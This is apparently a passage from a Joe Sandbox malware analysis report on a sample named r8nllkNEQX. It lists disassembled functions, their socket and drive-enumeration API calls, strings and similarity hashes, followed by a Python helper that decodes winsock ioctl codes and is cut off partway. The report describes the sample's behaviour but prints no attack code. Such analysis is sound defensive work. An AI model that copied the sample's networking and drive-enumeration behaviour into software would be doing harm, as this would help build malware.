                                    Control-flow Graph (rendered graph not preserved): function 2d7770, basic blocks 2d7770-2d7832; API called: recv; internal calls: 2d72a0, 2dcb20, 658c50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: the same seventeen associated memory dumps listed for the first function in this section
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: recv
                                    • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                    • API String ID: 1507349165-640788491
                                    • Opcode ID: b207039796bc14599fe94fe75bd13d7071c359de182f6feb7e09871eb62d57dd
                                    • Instruction ID: c85df163ea9edd3df6f9488b7cd44ff7b6fcf9fc7d341dd42e65f9a4ddaac1b7
                                    • Opcode Fuzzy Hash: b207039796bc14599fe94fe75bd13d7071c359de182f6feb7e09871eb62d57dd
                                    • Instruction Fuzzy Hash: 91117DB46283047BE110EF549C4AE677B5CEFC6B28F000A1AFD0493352E2659C21C6B1

                                    Control-flow Graph (rendered graph not preserved): function 2d75e0, basic blocks 2d75e0-2d7699; API called: socket; internal calls: 2d72a0, 2dcb20, 658c50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: the same seventeen associated memory dumps listed for the first function in this section
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: socket
                                    • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                    • API String ID: 98920635-842387772
                                    • Opcode ID: 3b3f37b5fb1c40b1d11178fcc33dccc7cf2ca8614c309a2b392795203f591b48
                                    • Instruction ID: 7588ffe88885cc8030be724ea48c00b22c186263c1d34ebe99f9e5f6b4038b5b
                                    • Opcode Fuzzy Hash: 3b3f37b5fb1c40b1d11178fcc33dccc7cf2ca8614c309a2b392795203f591b48
                                    • Instruction Fuzzy Hash: 5F115971A1421237D620AF6CAC06FDB3B98EF86724F040922F810D23A3E215CC76C7E0

                                    Control-flow Graph (rendered graph not preserved): function 658e90, basic blocks 658e90-658f5e plus a second block range at 7a99b0-7a9a72; API called: _open; internal calls: 659f70, 658d20, 658ca8, 658cc0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: the same seventeen associated memory dumps listed for the first function in this section
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: _open
                                    • String ID: terminated$@
                                    • API String ID: 4183159743-3016906910
                                    • Opcode ID: e573d07b775a1c647dc8b336c8503d36f4a09693b2d51cceb847593cb2880f49
                                    • Instruction ID: d31d9bb64fdb38e768079f9ee6c583486f41ff3be270d1d65523b67524fd4e4c
                                    • Opcode Fuzzy Hash: e573d07b775a1c647dc8b336c8503d36f4a09693b2d51cceb847593cb2880f49
                                    • Instruction Fuzzy Hash: 13413CB09043059FCB10EFB9D4456AEBBF5AF89355F108A2DE898E7340E734D849CB56

                                    Control-flow Graph (rendered graph not preserved): function 30a150, basic blocks 30a150-30a250; API called: getsockname; internal calls: 2ed090, 30ef30, 314f40
                                    APIs
                                    • getsockname.WS2_32(?,?,00000080), ref: 0030A1C7
                                    Strings
                                    • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0030A23B
                                    • getsockname() failed with errno %d: %s, xrefs: 0030A1F0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: the same seventeen associated memory dumps listed for the first function in this section
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: getsockname
                                    • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                    • API String ID: 3358416759-2605427207
                                    • Opcode ID: 594c32d2c81050ca1e6651754cae2669e225f86f6452ca7d0759b74063be13af
                                    • Instruction ID: d307b11beb1351232ed46937ae26f9b9444d7e9dd74fd617d401b064cc9d7b9c
                                    • Opcode Fuzzy Hash: 594c32d2c81050ca1e6651754cae2669e225f86f6452ca7d0759b74063be13af
                                    • Instruction Fuzzy Hash: E421DB71948780A6E6269B19EC46FE773BCEF91324F040614F99853191FB3259868AD2

                                    Control-flow Graph (rendered graph not preserved): function 2ed5e0, basic blocks 2ed5e0-2ed68d; API called: WSAStartup; internal calls: 2ed690, 2f7620
                                    APIs
                                    • WSAStartup.WS2_32(00000202), ref: 002ED65B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: the same seventeen associated memory dumps listed for the first function in this section
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: Startup
                                    • String ID: if_nametoindex$iphlpapi.dll
                                    • API String ID: 724789610-3097795196
                                    • Opcode ID: 47ffce2886c3533351ae4c49d1a8fc54d73d8a6721e7c54a069befca7f6ee1ec
                                    • Instruction ID: b16e16562d6b8998df7c6293101dbc36553a0beaa2f55ad660fc773bdd71e364
                                    • Opcode Fuzzy Hash: 47ffce2886c3533351ae4c49d1a8fc54d73d8a6721e7c54a069befca7f6ee1ec
                                    • Instruction Fuzzy Hash: AF012BD0D903C206EB11BF39AD177B635A4AB15304FC41978D888822D2F7BCCA79C392
                                    APIs
                                    • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0039AB9B
                                    • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0039ABE3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: ioctlsocketsocket
                                    • String ID:
                                    • API String ID: 416004797-0
                                    • Opcode ID: b67a454e3ac4d7c988847c7cc69a63284c9243a4574d98487fad4f646d743ae5
                                    • Instruction ID: 59b66866182918fc7f79aad3e8b1a22d6e2450671ca7ed51197bea8a6ed8fea7
                                    • Opcode Fuzzy Hash: b67a454e3ac4d7c988847c7cc69a63284c9243a4574d98487fad4f646d743ae5
                                    • Instruction Fuzzy Hash: 40E1E070A047019BEB21CF24C884B6BB7E5EF89314F144B2CF9998B291E775DD44CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: eae54281b3fc9162cb49e9abb4997441d727cf813155db736f8aee8eab0a99f0
                                    • Instruction ID: fcf93f6e9cbe753dcf46ae156fbaafe431e0d68ecc47c2fcb58168ed48bcf1aa
                                    • Opcode Fuzzy Hash: eae54281b3fc9162cb49e9abb4997441d727cf813155db736f8aee8eab0a99f0
                                    • Instruction Fuzzy Hash: 9171F3EB16C219BD710285D12B54EFF6B6EE1E3734F30C62AF427D6A02F2940E4A5172
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: 3be85b6bda06fbc0e1df78ccf1cd9b624b1ae9caf4aecb4a1806f3c3c7654e54
                                    • Instruction ID: ab138dffd949e0c52e99eec8d19c098b336592e6eafb13a602084eee05cd1988
                                    • Opcode Fuzzy Hash: 3be85b6bda06fbc0e1df78ccf1cd9b624b1ae9caf4aecb4a1806f3c3c7654e54
                                    • Instruction Fuzzy Hash: CD7105EB16C21DBDB10285D12B54AFF6B6EE5E7730F30863AF427D6602F2D40A4A5171
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: f829e3c3fb16cf0e4ddd1ce65bff66f3ebfcbc97eaeb03e4fc157dd7c51dce7b
                                    • Instruction ID: 4c8ec387b3f6be60b17e887497e5acf7736829495d5a570c87fa228f4c5de7c3
                                    • Opcode Fuzzy Hash: f829e3c3fb16cf0e4ddd1ce65bff66f3ebfcbc97eaeb03e4fc157dd7c51dce7b
                                    • Instruction Fuzzy Hash: EB7105EB16C219BD710285D12B54AFF6B6EE5E3730F30862AF427D6A02F2D40E495172
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: d78f2ccf61fcfeeb7cdfab9897cbcf346cf938d65b48ae375e5ebb6c53f138db
                                    • Instruction ID: 2e05da2fab05fa4d1c8febccc1ee1f9811c5b25eeea922133be5b89bce3ef7ca
                                    • Opcode Fuzzy Hash: d78f2ccf61fcfeeb7cdfab9897cbcf346cf938d65b48ae375e5ebb6c53f138db
                                    • Instruction Fuzzy Hash: F96105EB16C21DBDB14285D12B54AFF6B6EE5E7330F30862AF427D6A02F2D40E495172
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: 0b5642632c3aea376366b8ddea2ccf77424be97fdbe22fa1cf6b0ab1e76b3254
                                    • Instruction ID: 0d5a22a64670c4612e0b42d9e4fca5b2315627cea9f44600831f8274c6f59736
                                    • Opcode Fuzzy Hash: 0b5642632c3aea376366b8ddea2ccf77424be97fdbe22fa1cf6b0ab1e76b3254
                                    • Instruction Fuzzy Hash: 556105EB16C21DBDB10285D12B54AFF6B6EE5E7730F30863AF427D6A02F2D40A495172
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: adee147c24cd93aca054c789bb2bd8e145d597049163bda7f5d5390c9fb456a4
                                    • Instruction ID: 7ceb2357899d96e96cc04b394bb1647bdc716da22f802bdf1c494bbf4497a297
                                    • Opcode Fuzzy Hash: adee147c24cd93aca054c789bb2bd8e145d597049163bda7f5d5390c9fb456a4
                                    • Instruction Fuzzy Hash: 616104EB16C219BDB10285D12B54AFF6B6EE5E3730F30862AF427D6A02F2D40A495172
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: 8661cb0540d96919d5430d63153904c93db3a987e8f098e2dd4500c16294cb74
                                    • Instruction ID: e5c765933f1d955f3bddce468a3189fa7eda0f79224fd27d004232968d730155
                                    • Opcode Fuzzy Hash: 8661cb0540d96919d5430d63153904c93db3a987e8f098e2dd4500c16294cb74
                                    • Instruction Fuzzy Hash: 106128EB16C219BDB10285D12B54AFF6B6EE5E7334F30863AF427D6602F2D40E495172
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: c586b42097aa89b8354618aa85b6e3786d5f8934a772bddf77642a13bb235233
                                    • Instruction ID: c4d2778e71a5cc0c502993626a86d193bfefd51b45c77483a187e75c3ac9f25f
                                    • Opcode Fuzzy Hash: c586b42097aa89b8354618aa85b6e3786d5f8934a772bddf77642a13bb235233
                                    • Instruction Fuzzy Hash: 9061F5EB16C219BDB10286D16B54AFF6B6EE5E7730F30862AF427D6602F2D40E495132
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: 2d6ca57760079dee7091eace24769c6328a65c63fca30fb87832df9b28fa434d
                                    • Instruction ID: 2cadac111aa5f9a47c2162f60a4bdd0cb271bbfc422b959edb3b1f2c05875d75
                                    • Opcode Fuzzy Hash: 2d6ca57760079dee7091eace24769c6328a65c63fca30fb87832df9b28fa434d
                                    • Instruction Fuzzy Hash: AD51D3EB16C229BDB10281D52B54AFF6B6EE5E7730F30862AF427D6A02F2D40A495171
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: f4fec3d8c4b96004a2e63ec276051a977725ba5feb10320e12ee6e71a8805295
                                    • Instruction ID: e985336500cdc48ef056402e9b6009c11858da1c6e230ff2c0558b253a27fbf2
                                    • Opcode Fuzzy Hash: f4fec3d8c4b96004a2e63ec276051a977725ba5feb10320e12ee6e71a8805295
                                    • Instruction Fuzzy Hash: DC61E7E726C219BDB20281D12B54AFF6B6EE5D7730F30866BF427D6602F2940E4E5131
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: c399c5aeafa8686b565ce503241ddf85db0cfc7effc1fde6d91d8658e3023997
                                    • Instruction ID: 6f1d1b9eb34fee6d5997a47356bc720c2485396c5cc491e8a6d9a7d346f3bc70
                                    • Opcode Fuzzy Hash: c399c5aeafa8686b565ce503241ddf85db0cfc7effc1fde6d91d8658e3023997
                                    • Instruction Fuzzy Hash: F351E1EB16C229BD710285D12B54AFF6A6EE5E7730F30863AF427D6A02F2D40E495132
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: daf739782cabba9e604661c8ee47e0d33decd910b1fad744d1d5776fcdd8929d
                                    • Instruction ID: 1cee347e6369426a9d667b2ebf0c838ac8f525c1260291aa95de0310d69ee318
                                    • Opcode Fuzzy Hash: daf739782cabba9e604661c8ee47e0d33decd910b1fad744d1d5776fcdd8929d
                                    • Instruction Fuzzy Hash: 9151D1EB16C229BD7102C5C52B54AFF6B7EE5E7734F30862AF427D6A02F2940A495131
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: b027f85cab366c932f0371f80911f0e25bb2d5695b65fe9686f51a6d3ac82e64
                                    • Instruction ID: dd7f059ab3fde312dc0bb2bf56e97348458fafdefda828efaf65e34cb1b38c47
                                    • Opcode Fuzzy Hash: b027f85cab366c932f0371f80911f0e25bb2d5695b65fe9686f51a6d3ac82e64
                                    • Instruction Fuzzy Hash: 0A51B1EB16C229BDB10285D12B54AFF6B7EE5D7734F30862AF427D5A02F2940E4D5131
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: 87451e09ce6ace9c99bce903740cca9bc6c66681474889351f5ccc833c614add
                                    • Instruction ID: 3da8dbcc1e9f6883c3a1a36ae4e9f8cd747933271238a1bd9de1f0ebb80d5ddb
                                    • Opcode Fuzzy Hash: 87451e09ce6ace9c99bce903740cca9bc6c66681474889351f5ccc833c614add
                                    • Instruction Fuzzy Hash: D951C0EB16C229BDB202C2D16B54AFF6B7EE5D7334F30862AF427D5A02F2940A4D5131
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: cfc727546288e2dfbfda240810a907ffb85d366875590de29b34bc2ceff251e1
                                    • Instruction ID: e060ce3160c4df6f40b38e9171e63be48ae63f7eb1af1249e9914df5f5ed6627
                                    • Opcode Fuzzy Hash: cfc727546288e2dfbfda240810a907ffb85d366875590de29b34bc2ceff251e1
                                    • Instruction Fuzzy Hash: D1518CEB16C229BD720282C16B54AFF6A6EE5D7734F30862AF427D5602F2D40E4D6031
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: eb317d7066312367d721ac8f2cff27fb602436d1b7e82436b1bfbad187736963
                                    • Instruction ID: 08fc69b8c076099bb0c2bed3fd6e8e8189bd92ed3bd32020ab84b9569febce09
                                    • Opcode Fuzzy Hash: eb317d7066312367d721ac8f2cff27fb602436d1b7e82436b1bfbad187736963
                                    • Instruction Fuzzy Hash: 2251C3EB56C228BD720281D16B54AFF6B6EE5D7730F30862AF417D6602F2950E4A5071
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: fbde086362fceef5e3a1a9f084a48013977552e635589969a044403ebd96720b
                                    • Instruction ID: d568926d62eb949373782ab5b4268513a882045ac06f3fafb9e6dbd1d2fedeb1
                                    • Opcode Fuzzy Hash: fbde086362fceef5e3a1a9f084a48013977552e635589969a044403ebd96720b
                                    • Instruction Fuzzy Hash: E041BFEB56C229BD710282D16B54AFF6B6EE1D7334F30862AF427D1A02F2940F4E6031
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 4c628e57f65e4b41dc2272ae4d3fd9de2cc74a714f397b0a8eca7736bac8e5e1
                                    • Instruction ID: c6829ae1d97415b9bf2b8c5a1ea0459d2eb877a9035d49fb49ee2e290a7f080d
                                    • Opcode Fuzzy Hash: 4c628e57f65e4b41dc2272ae4d3fd9de2cc74a714f397b0a8eca7736bac8e5e1
                                    • Instruction Fuzzy Hash: D451D4EB16C219BDB24282D52B649FF6B6EE5D7334F30866AF417D5602F2850E4D5031
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: cd83812538c01b7350d646cd83071b342d3300270918a8cf09141cc698536e54
                                    • Instruction ID: d5267878f7519c0702b384109c6081cf320db7dfaffcd54e4c97952f6bb5aba6
                                    • Opcode Fuzzy Hash: cd83812538c01b7350d646cd83071b342d3300270918a8cf09141cc698536e54
                                    • Instruction Fuzzy Hash: CF41A0EB16C229BD710286D56B54AFF6B6EE1D3734F308626F427D5602F2950F4D6031
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: ab00d339b30766397bccf8b324ef8db9e0c142858662e89c0f2605018e3ec4f1
                                    • Instruction ID: af7070079603f54205beac0c9509aaff9ceda5c20e7e78c5a2e1530f17f4d11b
                                    • Opcode Fuzzy Hash: ab00d339b30766397bccf8b324ef8db9e0c142858662e89c0f2605018e3ec4f1
                                    • Instruction Fuzzy Hash: 3B51C1EB56C228BDB20282D52B54AFF6B6EE5D7730F30862BF817D6602F2950E495071
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 6a385ccb9853df3792ee733c09a2378b0a4a67f6937947157fe17f59d123abe1
                                    • Instruction ID: 13065eefae8e29e542828ec3f292c733827b094dc0fa833aa90993e8764e7186
                                    • Opcode Fuzzy Hash: 6a385ccb9853df3792ee733c09a2378b0a4a67f6937947157fe17f59d123abe1
                                    • Instruction Fuzzy Hash: 1441A2EB56C229BD714281D16B54AFF6B6EE5D3334F30862BF427D5602F2940E4D6031
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 3dbe012ca51d963ab76529c504411e7779564eff15619b0a97e214df16def92d
                                    • Instruction ID: f2298e4ed4c1bd6a0ffb8a8de8af0d09efb4cbefe6016306ba9b308c6d7ce535
                                    • Opcode Fuzzy Hash: 3dbe012ca51d963ab76529c504411e7779564eff15619b0a97e214df16def92d
                                    • Instruction Fuzzy Hash: F641E3EB56C128BDB202C2D16B54AFE6B6EE5D7730F30862AF417D6602F2950E4E5031
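Two of the API records in this listing repay decoding by hand: the ioctlsocket call at ref 0039ABE3 passes command code 8004667E, which is FIONBIO (the socket opened at ref 0039AB9B is switched to non-blocking mode), and the GetLogicalDrives calls at ref 070A0CB8 sit in functions whose only string is "A:\", the shape of a drive-letter loop that starts at A: and advances one letter per bit of the returned mask (an inference from those two facts, not something the report states). The script below is an added example for reading such records; it is not Joe Sandbox output and not code recovered from the sample. The three record strings are copied from the listing above; the FIONBIO/FIONREAD/FIOASYNC/SIOCATMARK codes are rebuilt from the winsock2.h macro definitions; DEMO_MASK is a constructed value standing in for a live GetLogicalDrives() result. The FFFFFFFF recorded as the first argument of socket() is left undecoded.

```python
"""Decode the Win32 API records printed in a Joe Sandbox function listing.

Added example for reading the report; not sandbox output, not sample code.
"""
import re

# Winsock ioctl code layout, as defined in winsock2.h.
IOC_IN = 0x80000000       # parameter is copied into the kernel (_IOW)
IOC_OUT = 0x40000000      # parameter is copied back to the caller (_IOR)
IOCPARM_MASK = 0x7F       # parameter-size field is 7 bits wide


def winsock_ioctl(direction: int, group: str, num: int, size: int = 4) -> int:
    """Rebuild _IOR/_IOW(group, num, u_long) exactly as winsock2.h does."""
    return direction | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num


KNOWN_IOCTLS = {
    winsock_ioctl(IOC_IN, "f", 126): "FIONBIO",     # 0x8004667E, seen in the report
    winsock_ioctl(IOC_IN, "f", 125): "FIOASYNC",    # 0x8004667D
    winsock_ioctl(IOC_OUT, "f", 127): "FIONREAD",   # 0x4004667F
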